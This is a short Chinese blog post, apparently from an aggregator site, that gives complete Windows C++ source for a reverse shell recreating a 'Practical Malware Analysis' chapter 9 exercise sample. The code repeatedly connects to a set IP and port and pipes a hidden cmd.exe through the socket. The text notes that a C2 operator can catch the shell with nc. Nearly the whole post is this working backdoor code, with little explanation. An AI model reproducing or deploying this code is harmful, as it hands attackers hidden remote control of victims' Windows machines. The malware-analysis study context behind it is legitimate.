這段代碼比我還老了，哈哈~

功能很簡單，就是一直嘗試向某個ip:port反彈shell，C2用nc就能接收這個反彈shell。

// RedirectCmd.cpp : Defines the entry point for the console application. // 還原《惡意代碼分析實戰》第九章練習樣本2#include "stdafx.h" #include <WinSock2.h> #include <Windows.h>#pragma comment(lib,"ws2_32")#define DELAYMILLSECOND 3000 #define REMOTE_PORT 9999 #define REMOTE_IP "localhost" #define CMD_STR "cmd"int _tmain(int argc, _TCHAR* argv[]) {while (1){WSAData WsaData;if (0 != WSAStartup(MAKEWORD(2,2), &WsaData)){break;}SOCKET socket = WSASocketA(AF_INET,SOCK_STREAM,IPPROTO_TCP,NULL,0,0);if (INVALID_SOCKET == socket){break;}hostent * host = gethostbyname(REMOTE_IP);if (NULL == host){closesocket(socket);WSACleanup();Sleep(DELAYMILLSECOND);continue;}sockaddr socka;*(WORD*)socka.sa_data = ntohs(REMOTE_PORT);*(DWORD*)&socka.sa_data[2] = **(DWORD**)host->h_addr_list;socka.sa_family = AF_INET;int res = connect(socket,&socka,sizeof(socka));if (-1 == res){closesocket(socket);WSACleanup();Sleep(DELAYMILLSECOND);continue;}// redirect cmdSTARTUPINFOA sa = {0};PROCESS_INFORMATION pi = {0};sa.cb = sizeof(sa);sa.dwFlags = STARTF_USESHOWWINDOW | STARTF_USESTDHANDLES;sa.wShowWindow = SW_HIDE;sa.hStdError = sa.hStdInput = sa.hStdOutput = (HANDLE)socket;CreateProcessA(0,CMD_STR,0,0,1,0,0,0,&sa,&pi);WaitForSingleObject(pi.hProcess,INFINITE);closesocket(socket);WSACleanup();Sleep(DELAYMILLSECOND);}return 0; }

總結

以上是生活随笔為你收集整理的CreateProcess 重定向CMD实现反弹shell的全部內容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網站內容還不錯，歡迎將生活随笔推薦給好友。